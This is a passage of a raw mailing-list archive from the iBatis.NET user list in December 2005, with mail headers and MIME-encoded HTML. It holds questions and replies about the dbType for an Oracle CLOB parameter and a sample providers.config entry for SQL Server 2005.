class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Hi all,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I try to call a stored procedure with a parameter in = Oracle CLOB type I&#8217;m not sure which dbtype will be used in parameterMap = for this parameter. Is it &#8220;Raw&#8221; type? I currently use <font = color=3Dblack><span style=3D'color:black'>oracle10.1</span></font> provider, database is = Oracle 9i and latest iBatis DataMapper codes from = SVN.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Anybody has idea for = this?<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Thanks in advance.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Tony<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C604EF.26F23C92-- From [email protected] Tue Dec 20 01:07:34 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76726 invoked from network); 20 Dec 2005 01:07:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Dec 2005 01:07:34 -0000 Received: (qmail 40814 invoked by uid 500); 20 Dec 2005 01:07:34 -0000 Delivered-To: [email protected] Received: (qmail 40799 invoked by uid 500); 20 Dec 2005 01:07:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40788 invoked by uid 99); 20 Dec 2005 01:07:33 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Dec 2005 17:07:33 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Dec 2005 17:07:32 -0800 Received: by wproxy.gmail.com with SMTP id 71so1168466wri for <[email protected]>; Mon, 19 Dec 2005 17:07:12 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=fUDcZYiIFPjeKxVBbeh2NLJH9yHDOzvPX7Ej9a9MnlD88qFN6BOGvMZK7LvUr4i8+2gj0WBXQpZh2qrbUs6GS2p2rJwxtK7SjLy6E6CJqvhJal68+h7JIZO1e/NLxASKHfK8nG1+F16o+0POupadvbdg2NpPUhqoYCDJdGGJ6+c= Received: by 161.129.204.104 with SMTP id v15mr210699wrc; Mon, 19 Dec 2005 17:07:11 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 19 Dec 2005 17:07:11 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 19 Dec 2005 20:07:11 -0500 From: Roberto R <[email protected]> To: [email protected] Subject: Re: What dbType will be used for Oracle CLOB ? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_713_32687341.1135040831717" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_713_32687341.1135040831717 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Can you try Clob? I haven't tried it myself though. On 12/19/05, Tony Shi <[email protected]> wrote: > > Hi all, > > > > I try to call a stored procedure with a parameter in Oracle CLOB type I'm > not sure which dbtype will be used in parameterMap for this parameter. Is= it > "Raw" type? I currently use oracle10.1 provider, database is Oracle 9i an= d > latest iBatis DataMapper codes from SVN. > > > > Anybody has idea for this? > > > > Thanks in advance. > > > > Tony > > > > > ------=_Part_713_32687341.1135040831717 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Can you try Clob?&nbsp; I haven't tried it myself though.<br><br><div><span= class=3D"gmail_quote">On 12/19/05, <b class=3D"gmail_sendername">Tony Shi<= /b> &lt;<a href=3D"mailto:[email protected]">[email protected]</a>&gt; wrote:= </span><blockquote class=3D"gmail_quote" style=3D"border-left: 1px solid rg= b(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> <div> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">Hi all,</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">I try to call a stored procedure with a parameter in Oracle CLOB type I'm not sure which dbtype will be used in parameterMap for this parameter. Is it "Raw" type? I currently use <font color=3D"black"><span st= yle=3D"color: black;">oracle10.1</span></font> provider, database is Oracle= 9i and latest iBatis DataMapper codes from SVN.</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">Anybody has idea for this?</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">Thanks in advance.</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">Tony</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> </div> </blockquote></div><br> ------=_Part_713_32687341.1135040831717-- From [email protected] Wed Dec 21 22:18:53 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28999 invoked from network); 21 Dec 2005 22:18:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Dec 2005 22:18:41 -0000 Received: (qmail 82336 invoked by uid 500); 21 Dec 2005 22:18:39 -0000 Delivered-To: [email protected] Received: (qmail 82077 invoked by uid 500); 21 Dec 2005 22:18:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81896 invoked by uid 99); 21 Dec 2005 22:18:35 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Dec 2005 14:18:35 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO hotlips.DBSA.LOCAL) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Dec 2005 14:18:14 -0800 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C6067C.624C207C" Subject: How to set the providers.config for Microsoft SQL Server 2005 X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0 Date: Thu, 22 Dec 2005 09:17:52 +1100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: How to set the providers.config for Microsoft SQL Server 2005 Thread-Index: AcYGfFPtE3REwduQSK6l3FOzmmHYyg== From: "Wiryadi Adidharma" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C6067C.624C207C Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi, =20 We currently use Ibatis.Net connected to Microsoft SQL Server 2000. We plan to migrate to Microsoft SQL Server 2005. Is there any sample of providers.config for SQL server 2005? =20 Thank you =20 Regards, =20 Wiryadi Adidharma ------_=_NextPart_001_01C6067C.624C207C Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html> <head> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 10 (filtered)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {font-family:Arial; color:windowtext;} @page Section1 {size:595.3pt 841.9pt; margin:2.0cm 2.0cm 2.0cm 70.9pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-AU link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Hi,</span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;</span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>We currently use Ibatis.Net connected to Microsoft = SQL Server 2000.</span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>We plan to migrate to Microsoft SQL Server = 2005.</span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Is there any sample of providers.config for SQL = server 2005?</span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;</span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Thank you</span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;</span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>Regards,</span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'>&nbsp;</span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'>Wiryadi Adidharma</span></font></p> </div> </body> </html> =00 ------_=_NextPart_001_01C6067C.624C207C-- From [email protected] Wed Dec 21 22:23:29 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31625 invoked from network); 21 Dec 2005 22:23:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Dec 2005 22:23:28 -0000 Received: (qmail 94661 invoked by uid 500); 21 Dec 2005 22:23:24 -0000 Delivered-To: [email protected] Received: (qmail 94621 invoked by uid 500); 21 Dec 2005 22:23:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94597 invoked by uid 99); 21 Dec 2005 22:23:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Dec 2005 14:23:24 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Dec 2005 14:23:23 -0800 Received: by zproxy.gmail.com with SMTP id l8so257824nzf for <[email protected]>; Wed, 21 Dec 2005 14:23:03 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=UnXgU+XZHMPSP3u2+7q3j0HGQPhsHKE8KZqU7BWT/HbdTequNYqlCaGx0IFm/p8b9gZqkKOWMGDeO0DMd87J9D4mkd8fAzXHPB1/ADz8W047q606Nb73JDUFRYddpM0mi1AQZBPKmR5ZLWsQR5UyJhpFP7qcs/z128z6Yy5TW98= Received: by 161.129.204.104 with SMTP id p9mr5677qbq; Wed, 21 Dec 2005 14:23:02 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 21 Dec 2005 14:23:01 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 21 Dec 2005 14:23:01 -0800 From: Mario Chavez <[email protected]> To: [email protected] Subject: Re: How to set the providers.config for Microsoft SQL Server 2005 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_29942_4443710.1135203781609" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_29942_4443710.1135203781609 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline For sql2005 I'm using the following configuration in providers: <provider name=3D"sqlServer2.0" enabled=3D"true" assemblyName=3D"System.Data, Version=3D2.0.50215.0, Culture=3Dneutr= al, PublicKeyToken=3Db77a5c561934e089" connectionClass=3D"System.Data.SqlClient.SqlConnection" commandClass=3D"System.Data.SqlClient.SqlCommand" parameterClass=3D"System.Data.SqlClient.SqlParameter" parameterDbTypeClass=3D"System.Data.SqlDbType" parameterDbTypeProperty=3D"SqlDbType" dataAdapterClass=3D"System.Data.SqlClient.SqlDataAdapter" commandBuilderClass=3D"System.Data.SqlClient.SqlCommandBuilder" usePositionalParameters =3D "false" useParameterPrefixInSql =3D "true" useParameterPrefixInParameter =3D "true" parameterPrefix=3D"@" /> On 12/21/05, Wiryadi Adidharma <[email protected]> wrote: > > Hi, > > > > We currently use Ibatis.Net connected to Microsoft SQL Server 2000. > > We plan to migrate to Microsoft SQL Server 2005. > > Is there any sample of providers.config for SQL server 2005? > > > > Thank you > > > > Regards, > > > > Wiryadi Adidharma > -- Mario Chavez [email protected] http://mario-chavez.decisionesinteligentes.com/ ------=_Part_29942_4443710.1135203781609 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline For sql2005 I'm using the following configuration in providers:<br>&lt;prov= ider<br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; name=3D&quot;sqlServer2.0&quo= t;<br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; enabled=3D&quot;true&quot;<br>&= nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; assemblyName=3D&quot;System.Data, Vers= ion=3D2.0.50215.0, Culture=3Dneutral, PublicKeyToken=3Db77a5c561934e089&quo= t; <br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; connectionClass=3D&quot;System.Da= ta.SqlClient.SqlConnection&quot; <br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; = commandClass=3D&quot;System.Data.SqlClient.SqlCommand&quot;<br>&nbsp;&nbsp;= &nbsp; &nbsp;&nbsp;&nbsp; parameterClass=3D&quot;System.Data.SqlClient.SqlP= arameter&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; parameterDbTypeClass=3D&quot;System.D= ata.SqlDbType&quot;<br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; parameterDbTyp= eProperty=3D&quot;SqlDbType&quot;<br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; = dataAdapterClass=3D&quot;System.Data.SqlClient.SqlDataAdapter&quot;<br>&nbs= p;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; commandBuilderClass=3D&quot; System.Data.SqlClient.SqlCommandBuilder&quot;<br>&nbsp;&nbsp;&nbsp; &nbsp;&= nbsp;&nbsp; usePositionalParameters =3D &quot;false&quot;<br>&nbsp;&nbsp;&n= bsp; &nbsp;&nbsp;&nbsp; useParameterPrefixInSql =3D &quot;true&quot;<br>&nb= sp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; useParameterPrefixInParameter =3D &quot;= true&quot;&nbsp;&nbsp;&nbsp; <br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; parameterPrefix=3D&quot;@&quot;<br>&n= bsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; /&gt;<br><br><div><span class=3D"gmail_= quote">On 12/21/05, <b class=3D"gmail_sendername">Wiryadi Adidharma</b> &lt= ;<a href=3D"mailto:[email protected]">[email protected]= m.au </a>&gt; wrote:</span><blockquote class=3D"gmail_quote" style=3D"border-lef= t: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1= ex;"> <div> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">Hi,</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">We currently use Ibatis.Net connected to Microsoft SQL Server 2000.</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">We plan to migrate to Microsoft SQL Server 2005.</span></font>= </p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">Is there any sample of providers.config for SQL server 2005?</= span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">Thank you</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">&nbsp;</span></font></p> <p><font face=3D"Arial" size=3D"2"><span style=3D"font-size: 10pt; font-fam= ily: Arial;">Regards,</span></font></p> <p><font face=3D"Times New Roman" size=3D"3"><span style=3D"font-size: 12pt= ;">&nbsp;</span></font></p> <p><font face=3D"Times New Roman" size=3D"3"><span style=3D"font-size: 12pt= ;">Wiryadi Adidharma</span></font></p> </div> </blockquote></div><br><br clear=3D"all"><br>-- <br>Mario Chavez<br><a href= =3D"mailto:[email protected]">[email protected]</a><br><a href=3D= "http://mario-chavez.decisionesinteligentes.com/">http://mario-chavez.decis= ionesinteligentes.com/ </a> ------=_Part_29942_4443710.1135203781609-- From [email protected] Wed Dec 21 22:25:43 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33461 invoked from network); 21 Dec 2005 22:25:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Dec 2005 22:25:42 -0000 Received: (qmail 97859 invoked by uid 500); 21 Dec 2005 22:25:39 -0000 Delivered-To: [email protected] Received: (qmail 97846 invoked by uid 500); 21 Dec 2005 22:25:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97835 invoked by uid 99); 21 Dec 2005 22:25:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Dec 2005 14:25:39 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO hotlips.DBSA.LOCAL) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Dec 2005 14:25:38 -0800 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C6067D.6B113A3E" Subject: RE: How to set the providers.config for Microsoft SQL Server 2005 X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0 Date: Thu, 22 Dec 2005 09:25:16 +1100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: How to set the providers.config for Microsoft SQL Server 2005 Thread-Index: AcYGfSwC29FqhSBHRDeHMWNmyJ/etwAACOiw From: "Wiryadi Adidharma" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C6067D.6B113A3E Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Thank you =20 -----Original Message----- From: Mario Chavez [mailto:[email protected]]=20 Sent: Thursday, 22 December 2005 9:23 AM To: [email protected] Subject: Re: How to set the providers.config for Microsoft SQL Server 2005 =20 For sql2005 I'm using the following configuration in providers: <provider name=3D"sqlServer2.0" enabled=3D"true" assemblyName=3D"System.Data, Version=3D2.0.50215.0, = Culture=3Dneutral, PublicKeyToken=3Db77a5c561934e089"=20 connectionClass=3D"System.Data.SqlClient.SqlConnection"=20 commandClass=3D"System.Data.SqlClient.SqlCommand" parameterClass=3D"System.Data.SqlClient.SqlParameter" parameterDbTypeClass=3D"System.Data.SqlDbType" parameterDbTypeProperty=3D"SqlDbType" dataAdapterClass=3D"System.Data.SqlClient.SqlDataAdapter" commandBuilderClass=3D" System.Data.SqlClient.SqlCommandBuilder" usePositionalParameters =3D "false" useParameterPrefixInSql =3D "true" useParameterPrefixInParameter =3D "true" =20 parameterPrefix=3D"@" /> On 12/21/05, Wiryadi Adidharma <[email protected] > wrote: Hi, =20 We currently use Ibatis.Net connected to Microsoft SQL Server 2000. We plan to migrate to Microsoft SQL Server 2005. Is there any sample of providers.config for SQL server 2005? =20 Thank you =20 Regards, =20 Wiryadi Adidharma --=20 Mario Chavez [email protected] http://mario-chavez.decisionesinteligentes.com/=20 ------_=_NextPart_001_01C6067D.6B113A3E Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html> <head> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 10 (filtered)"> <style> <!-- /* Font Definitions */ @font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:blue; text-decoration:underline;} p {margin-right:0cm; margin-left:0cm; font-size:12.0pt; font-family:"Times New Roman";} span.EmailStyle19 {font-family:Arial; color:navy;} @page Section1 {size:595.3pt 841.9pt; margin:2.0cm 2.0cm 2.0cm 70.9pt;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-AU link=3Dblue vlink=3Dblue> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>Thank you</span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dnavy face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial;color:navy'>&nbsp;</span></font></p> <p class=3DMsoNormal style=3D'margin-left:36.0pt'><font size=3D2 = face=3DTahoma><span lang=3DEN-US style=3D'font-size:10.0pt;font-family:Tahoma'>-----Original Message-----<br> <b><span style=3D'font-weight:bold'>From:</span></b> Mario Chavez [mailto:[email protected]] <br> <b><span style=3D'font-weight:bold'>Sent:</span></b> Thursday, 22 = December 2005 9:23 AM<br> <b><span style=3D'font-weight:bold'>To:</span></b> = [email protected]<br> <b><span style=3D'font-weight:bold'>Subject:</span></b> Re: How to set = the providers.config for Microsoft SQL Server 2005</span></font></p> <p class=3DMsoNormal style=3D'margin-left:36.0pt'><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size:12.0pt'>&nbsp;</span></font></p> <p class=3DMsoNormal = style=3D'margin-right:0cm;margin-bottom:12.0pt;margin-left: 36.0pt'><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size:12.0pt'>For sql2005 I'm using the following configuration in providers:<br> &lt;provider<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; = name=3D&quot;sqlServer2.0&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; enabled=3D&quot;true&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; assemblyName=3D&quot;System.Data, Version=3D2.0.50215.0, Culture=3Dneutral, = PublicKeyToken=3Db77a5c561934e089&quot; <br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; connectionClass=3D&quot;System.Data.SqlClient.SqlConnection&quot; <br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; commandClass=3D&quot;System.Data.SqlClient.SqlCommand&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; parameterClass=3D&quot;System.Data.SqlClient.SqlParameter&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; parameterDbTypeClass=3D&quot;System.Data.SqlDbType&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; parameterDbTypeProperty=3D&quot;SqlDbType&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; dataAdapterClass=3D&quot;System.Data.SqlClient.SqlDataAdapter&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; commandBuilderClass=3D&quot; = System.Data.SqlClient.SqlCommandBuilder&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; usePositionalParameters =3D &quot;false&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; useParameterPrefixInSql =3D &quot;true&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; useParameterPrefixInParameter =3D &quot;true&quot;&nbsp;&nbsp;&nbsp; <br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; = parameterPrefix=3D&quot;@&quot;<br> &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; /&gt;</span></font></p> <div> <p class=3DMsoNormal style=3D'margin-left:36.0pt'><span = class=3Dgmailquote><font size=3D3 face=3D"Times New Roman"><span style=3D'font-size:12.0pt'>On = 12/21/05, <b><span style=3D'font-weight:bold'>Wiryadi Adidharma</span></b> &lt;<a href=3D"mailto:[email protected]">[email protected].= au </a>&gt; wrote:</span></font></span></p> <div> <p style=3D'margin-left:36.0pt'><font size=3D2 face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>Hi,</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D2 face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>&nbsp;</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D2 face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>We currently use Ibatis.Net connected to = Microsoft SQL Server 2000.</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D2 face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>We plan to migrate to Microsoft SQL Server = 2005.</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D2 face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>Is there any sample of providers.config for = SQL server 2005?</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D2 face=3DArial><span = style=3D'font-size: 10.0pt;font-family:Arial'>&nbsp;</span></font></p> <p style=3D'margin-left:36.0pt'><font size=3D2 